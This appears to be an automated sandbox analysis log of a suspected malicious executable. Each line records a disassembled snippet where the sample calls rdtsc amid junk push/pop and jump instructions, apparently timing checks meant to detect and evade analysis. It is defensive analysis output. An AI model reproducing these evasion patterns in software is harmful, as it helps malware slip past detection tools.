Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F617 second address: 77F644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E11h 0x00000009 pop ebx 0x0000000a jmp 00007F36ED361E17h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F644 second address: 77F649 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F79B second address: 77F79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F79F second address: 77F7C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F36EC8543D1h 0x0000000c jbe 00007F36EC8543C6h 0x00000012 pop esi 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 77F7C1 second address: 77F7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F36ED361E16h 0x0000000c push eax 0x0000000d jnc 00007F36ED361E06h 0x00000013 jno 00007F36ED361E06h 0x00000019 pop eax 0x0000001a jng 00007F36ED361E0Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787511 second address: 787552 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CDh 0x00000007 je 00007F36EC8543EAh 0x0000000d jmp 00007F36EC8543D6h 0x00000012 jmp 00007F36EC8543CEh 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787552 second address: 787563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36ED361E0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787563 second address: 78756D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F36EC8543C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7862D8 second address: 7862DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7865F9 second address: 7865FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7865FF second address: 786603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786603 second address: 786607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786607 second address: 786619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786619 second address: 786625 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F36EC8543CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ED7E second address: 72ED94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edi 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72ED94 second address: 72EDC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 nop 0x00000007 ja 00007F36EC8543CCh 0x0000000d mov ebx, dword ptr [ebp+1247FE22h] 0x00000013 mov ecx, esi 0x00000015 add eax, ebx 0x00000017 mov ch, dh 0x00000019 push eax 0x0000001a jnp 00007F36EC8543D4h 0x00000020 push eax 0x00000021 push edx 0x00000022 jg 00007F36EC8543C6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 72EDC2 second address: 72EE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F36ED361E08h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 add ch, 00000051h 0x00000026 mov edi, 149A1DF1h 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F36ED361E08h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push ecx 0x00000048 adc di, D820h 0x0000004d pop edx 0x0000004e nop 0x0000004f push ecx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78676A second address: 786782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 786782 second address: 786786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78724F second address: 787255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 787255 second address: 787278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F36ED361E10h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F36ED361E0Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C59E second address: 78C5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C5A5 second address: 78C5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C5AE second address: 78C5CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C751 second address: 78C756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C756 second address: 78C75C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78C75C second address: 78C760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78CA16 second address: 78CA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D25D second address: 78D262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D508 second address: 78D513 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D513 second address: 78D519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D519 second address: 78D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78D51E second address: 78D525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DAB4 second address: 78DB09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F36EC8543D4h 0x00000008 jmp 00007F36EC8543D6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 je 00007F36EC8543E6h 0x0000001a push edi 0x0000001b jmp 00007F36EC8543CEh 0x00000020 pop edi 0x00000021 pushad 0x00000022 jng 00007F36EC8543C6h 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDEC second address: 78DDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F36ED361E0Ch 0x0000000b jo 00007F36ED361E06h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DDFD second address: 78DE02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 78DE02 second address: 78DE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796288 second address: 79628C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79628C second address: 7962B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F36ED361E0Eh 0x00000012 jnl 00007F36ED361E06h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F36ED361E06h 0x00000022 ja 00007F36ED361E06h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7962B4 second address: 7962B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7965C7 second address: 7965CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796715 second address: 796720 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796720 second address: 79672A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79672A second address: 79673D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F36EC8543C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F36EC8543C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79673D second address: 796741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796741 second address: 796758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F36EC8543CCh 0x0000000c jg 00007F36EC8543C6h 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7969C8 second address: 7969D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36ED361E12h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7969D4 second address: 7969DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7969DA second address: 796A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jbe 00007F36ED361E06h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 popad 0x00000013 push esi 0x00000014 pushad 0x00000015 jnc 00007F36ED361E06h 0x0000001b jmp 00007F36ED361E0Eh 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796A07 second address: 796A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796C8A second address: 796C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796DE4 second address: 796DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796DE8 second address: 796E0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F36ED361E0Ah 0x00000011 popad 0x00000012 jo 00007F36ED361E1Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 796E0B second address: 796E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D2B5 second address: 79D2D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F36ED361E11h 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D3FE second address: 79D40F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F36EC8543CAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D40F second address: 79D413 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D413 second address: 79D429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36EC8543CDh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D429 second address: 79D431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D8AB second address: 79D8B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79D8B1 second address: 79D8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F36ED361E0Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA35 second address: 79DA59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F36EC8543C6h 0x0000000d jmp 00007F36EC8543D5h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA59 second address: 79DA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 js 00007F36ED361E06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DA69 second address: 79DA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DD69 second address: 79DD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DEC0 second address: 79DEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79DEC4 second address: 79DECE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36ED361E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E02F second address: 79E033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E033 second address: 79E054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E17h 0x00000007 jno 00007F36ED361E06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79E054 second address: 79E063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007F36EC8543C6h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EF93 second address: 79EF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 79EF97 second address: 79EF9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6D3B second address: 7A6D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F36ED361E06h 0x0000000a pop ecx 0x0000000b push edx 0x0000000c jmp 00007F36ED361E0Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7A6D53 second address: 7A6D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F36EC8543CDh 0x0000000a jmp 00007F36EC8543CFh 0x0000000f popad 0x00000010 push eax 0x00000011 je 00007F36EC8543C8h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jmp 00007F36EC8543D4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B93D1 second address: 7B93E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36ED361E0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0BE5 second address: 7C0BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0BEB second address: 7C0BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0BEF second address: 7C0C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F36EC8543D9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5380 second address: 7C538A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C538A second address: 7C53D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36EC8543D1h 0x00000009 jmp 00007F36EC8543D8h 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push edi 0x00000016 jmp 00007F36EC8543D2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA44A second address: 7CA45B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CA45B second address: 7CA460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EC90F second address: 6EC922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D121F second address: 7D1266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36EC8543CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b jmp 00007F36EC8543CCh 0x00000010 jmp 00007F36EC8543D1h 0x00000015 pop edi 0x00000016 push eax 0x00000017 jmp 00007F36EC8543D1h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFC28 second address: 7CFC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD77 second address: 7CFD7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD7B second address: 7CFD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F36ED361E06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFD87 second address: 7CFDA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F36EC8543D0h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CFF0E second address: 7CFF37 instructions: 0x00000000 rdtsc 0x00000002 js 00007F36ED361E06h 0x00000008 jmp 00007F36ED361E17h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F36ED361E06h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D01C5 second address: 7D0206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnl 00007F36EC8543D4h 0x0000000b pop edx 0x0000000c pushad 0x0000000d jnp 00007F36EC8543C8h 0x00000013 push esi 0x00000014 pop esi 0x00000015 jmp 00007F36EC8543D4h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e jbe 00007F36EC8543C6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D04F3 second address: 7D04F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D04F7 second address: 7D04FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
